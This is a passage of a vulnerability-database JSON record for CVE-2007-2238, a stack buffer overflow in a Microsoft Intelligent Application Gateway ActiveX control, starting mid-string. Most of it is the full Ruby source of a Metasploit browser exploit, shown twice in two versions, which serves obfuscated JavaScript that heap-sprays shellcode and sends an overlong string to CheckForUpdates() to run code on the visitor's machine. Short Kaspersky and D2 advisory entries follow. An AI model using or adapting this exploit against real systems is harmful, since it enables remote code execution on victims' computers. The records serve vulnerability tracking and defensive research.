\njs.update_opts(js_heap_spray.opts) \njs.obfuscate() \ncontent = %Q| \n<html> \n<body> \n<script><!-- \n#{js} \n//</script> \n</body> \n</html> \n| \n \nprint_status(\"Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...\") \n \n# 
Transmit the response to the client \nsend_response_html(cli, content) \n \n# Handle the payload \nhandler(cli) \nend \n \nend \n`\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/82980/mswhale_checkforupdates.rb.txt"}], "exploitdb": [{"lastseen": "2016-02-02T00:14:52", "bulletinFamily": "exploit", "description": "Microsoft Whale Intelligent Application Gateway ActiveX Control Buffer Overflow. CVE-2007-2238. Remote exploit for windows platform", "modified": "2010-05-09T00:00:00", "published": "2010-05-09T00:00:00", "id": "EDB-ID:16608", "href": "https://www.exploit-db.com/exploits/16608/", "type": "exploitdb", "title": "Microsoft Whale Intelligent Application Gateway ActiveX Control Buffer Overflow", "sourceData": "##\r\n# $Id: mswhale_checkforupdates.rb 9262 2010-05-09 17:45:00Z jduck $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = NormalRanking\r\n\r\n\tinclude Msf::Exploit::Remote::HttpServer::HTML\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'Microsoft Whale Intelligent Application Gateway ActiveX Control Buffer Overflow',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module exploits a stack buffer overflow in Microsoft Whale Intelligent Application\r\n\t\t\t\tGateway Whale Client. 
When sending an overly long string to CheckForUpdates()\r\n\t\t\t\tmethod of WhlMgr.dll (3.1.502.64) an attacker may be able to execute\r\n\t\t\t\tarbitrary code.\r\n\t\t\t},\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Author' => [ 'MC' ],\r\n\t\t\t'Version' => '$Revision: 9262 $',\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'CVE', '2007-2238' ],\r\n\t\t\t\t\t[ 'OSVDB', '53933'],\r\n\t\t\t\t\t[ 'URL', 'http://technet.microsoft.com/en-us/library/dd282918.aspx' ],\r\n\t\t\t\t],\r\n\t\t\t'DefaultOptions' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'EXITFUNC' => 'process',\r\n\t\t\t\t},\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 1024,\r\n\t\t\t\t\t'BadChars' => \"\\x00\",\r\n\t\t\t\t},\r\n\t\t\t'Platform' => 'win',\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7', { 'Ret' => '' } ]\r\n\t\t\t\t],\r\n\t\t\t'DisclosureDate' => 'Apr 15 2009',\r\n\t\t\t'DefaultTarget' => 0))\r\n\tend\r\n\r\n\tdef autofilter\r\n\t\tfalse\r\n\tend\r\n\r\n\tdef check_dependencies\r\n\t\tuse_zlib\r\n\tend\r\n\r\n\tdef on_request_uri(cli, request)\r\n\t\t# Re-generate the payload.\r\n\t\treturn if ((p = regenerate_payload(cli)) == nil)\r\n\r\n\t\t# fluff..\r\n\t\tfluff = rand_text_english(rand(20) + 1)\r\n\r\n\t\t# Encode the shellcode.\r\n\t\tshellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))\r\n\r\n\t\t# Set the return.\r\n\t\tret = Rex::Text.uri_encode(Metasm::Shellcode.assemble(Metasm::Ia32.new, \"or cl,[edx]\").encode_string * 2)\r\n\r\n\t\tjs = %Q|\r\n\t\t\ttry {\r\n\t\t\t\tvar evil_string = \"\";\r\n\t\t\t\tvar index;\r\n\t\t\t\tvar vulnerable = new ActiveXObject('ComponentManager.Installer.1');\r\n\t\t\t\tvar my_unescape = unescape;\r\n\t\t\t\tvar shellcode = '#{shellcode}';\r\n\t\t\t\t#{js_heap_spray}\r\n\t\t\t\tsprayHeap(my_unescape(shellcode), 0x0a0a0a0a, 0x40000);\r\n\t\t\t\tfor (index = 0; index < 15000; index++) {\r\n\t\t\t\t\tevil_string = evil_string + 
my_unescape('#{ret}');\r\n\t\t\t\t}\r\n\t\t\t\tvulnerable.CheckForUpdates(evil_string,'#{fluff}');\r\n\t\t\t} catch( e ) { window.location = 'about:blank' ; }\r\n\t\t|\r\n\r\n\t\topts = {\r\n\t\t\t'Strings' => true,\r\n\t\t\t'Symbols' => {\r\n\t\t\t\t'Variables' => [\r\n\t\t\t\t\t'vulnerable',\r\n\t\t\t\t\t'shellcode',\r\n\t\t\t\t\t'my_unescape',\r\n\t\t\t\t\t'index',\r\n\t\t\t\t\t'evil_string',\r\n\t\t\t\t]\r\n\t\t\t}\r\n\t\t}\r\n\t\tjs = ::Rex::Exploitation::ObfuscateJS.new(js, opts)\r\n\t\tjs.update_opts(js_heap_spray.opts)\r\n\t\tjs.obfuscate()\r\n\t\tcontent = %Q|<html>\r\n<body>\r\n<script><!--\r\n#{js}\r\n//</script>\r\n</body>\r\n</html>\r\n|\r\n\r\n\t\tprint_status(\"Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...\")\r\n\r\n\t\t# Transmit the response to the client\r\n\t\tsend_response_html(cli, content)\r\n\r\n\t\t# Handle the payload\r\n\t\thandler(cli)\r\n\tend\r\n\r\nend\r\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/16608/"}], "d2": [{"lastseen": "2019-05-29T17:19:07", "bulletinFamily": "exploit", "description": "**Name**| d2sec_msiag \n---|--- \n**CVE**| CVE-2007-2238 \n**Exploit Pack**| [D2ExploitPack](<http://http://www.d2sec.com/products.htm>) \n**Description**| Microsoft IAG 2007 ActiveX Stack Overflow Vulnerability \n**Notes**| \n", "modified": "2009-04-16T15:12:00", "published": "2009-04-16T15:12:00", "id": "D2SEC_MSIAG", "href": "http://exploitlist.immunityinc.com/home/exploitpack/D2ExploitPack/d2sec_msiag", "title": "DSquare Exploit Pack: D2SEC_MSIAG", "type": "d2", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "kaspersky": [{"lastseen": "2019-03-21T00:14:37", "bulletinFamily": "info", "description": "### *Detect date*:\n04/16/2009\n\n### *Severity*:\nCritical\n\n### *Description*:\nAn unspecified vulnerability was found in Microsoft IAG. 
By exploiting this vulnerability, malicious users can execute arbitrary code. This vulnerability can be exploited remotely via specially designed arguments.\n\n### *Affected products*:\nMicrosoft Intelligent Application Gateway versions 3.7 SP1 and earlier\n\n### *Solution*:\nUpdate to latest version\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft Intelligent Application Gateway](<https://threats.kaspersky.com/en/product/Microsoft-Intelligent-Application-Gateway/>)\n\n### *CVE-IDS*:\n[CVE-2007-2238](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2238>) 9.3 Critical", "modified": "2019-03-07T00:00:00", "published": "2009-04-16T00:00:00", "id": "KLA10392", "href": "https://threats.kaspersky.com/en/vulnerability/KLA10392", "title": "\r KLA10392 ACE vulnerability in Microsoft Intelligent Application Gateway ", "type": "kaspersky", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "metasploit": [{"lastseen": "2019-12-02T07:59:58", "bulletinFamily": "exploit", "description": "This module exploits a stack buffer overflow in Microsoft Whale Intelligent Application Gateway Whale Client. 
When sending an overly long string to CheckForUpdates() method of WhlMgr.dll (3.1.502.64) an attacker may be able to execute arbitrary code.\n", "modified": "2017-10-05T21:44:36", "published": "2009-04-15T21:38:50", "id": "MSF:EXPLOIT/WINDOWS/BROWSER/MSWHALE_CHECKFORUPDATES", "href": "", "type": "metasploit", "title": "Microsoft Whale Intelligent Application Gateway ActiveX Control Buffer Overflow", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = NormalRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Microsoft Whale Intelligent Application Gateway ActiveX Control Buffer Overflow',\n 'Description' => %q{\n This module exploits a stack buffer overflow in Microsoft Whale Intelligent Application\n Gateway Whale Client. When sending an overly long string to CheckForUpdates()\n method of WhlMgr.dll (3.1.502.64) an attacker may be able to execute\n arbitrary code.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [ 'MC' ],\n 'References' =>\n [\n [ 'CVE', '2007-2238' ],\n [ 'OSVDB', '53933'],\n [ 'URL', 'http://technet.microsoft.com/en-us/library/dd282918.aspx' ],\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'process',\n },\n 'Payload' =>\n {\n 'Space' => 1024,\n 'BadChars' => \"\\x00\",\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7', { 'Ret' => '' } ]\n ],\n 'DisclosureDate' => 'Apr 15 2009',\n 'DefaultTarget' => 0))\n end\n\n def autofilter\n false\n end\n\n def check_dependencies\n use_zlib\n end\n\n def on_request_uri(cli, request)\n # Re-generate the payload.\n return if ((p = regenerate_payload(cli)) == nil)\n\n # fluff..\n fluff = rand_text_english(rand(20) + 1)\n\n # Encode the shellcode.\n shellcode = Rex::Text.to_unescape(payload.encoded, 
Rex::Arch.endian(target.arch))\n\n # Set the return.\n ret = Rex::Text.uri_encode(Metasm::Shellcode.assemble(Metasm::Ia32.new, \"or cl,[edx]\").encode_string * 2)\n\n js = %Q|\n try {\n var evil_string = \"\";\n var index;\n var vulnerable = new ActiveXObject('ComponentManager.Installer.1');\n var my_unescape = unescape;\n var shellcode = '#{shellcode}';\n #{js_heap_spray}\n sprayHeap(my_unescape(shellcode), 0x0a0a0a0a, 0x40000);\n for (index = 0; index < 15000; index++) {\n evil_string = evil_string + my_unescape('#{ret}');\n }\n vulnerable.CheckForUpdates(evil_string,'#{fluff}');\n } catch( e ) { window.location = 'about:blank' ; }\n |\n\n opts = {\n 'Strings' => true,\n 'Symbols' => {\n 'Variables' => [\n 'vulnerable',\n 'shellcode',\n 'my_unescape',\n 'index',\n 'evil_string',\n ]\n }\n }\n js = ::Rex::Exploitation::ObfuscateJS.new(js, opts)\n js.update_opts(js_heap_spray.opts)\n js.obfuscate(memory_sensitive: true)\n content = %Q|<html>\n<body>\n<script><!--\n#{js}\n//</script>\n</body>\n</html>\n|\n\n print_status(\"Sending #{self.name}\")\n\n # Transmit the response to the client\n send_response_html(cli, content)\n\n # Handle the payload\n handler(cli)\n end\nend\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/browser/mswhale_checkforupdates.rb"}]}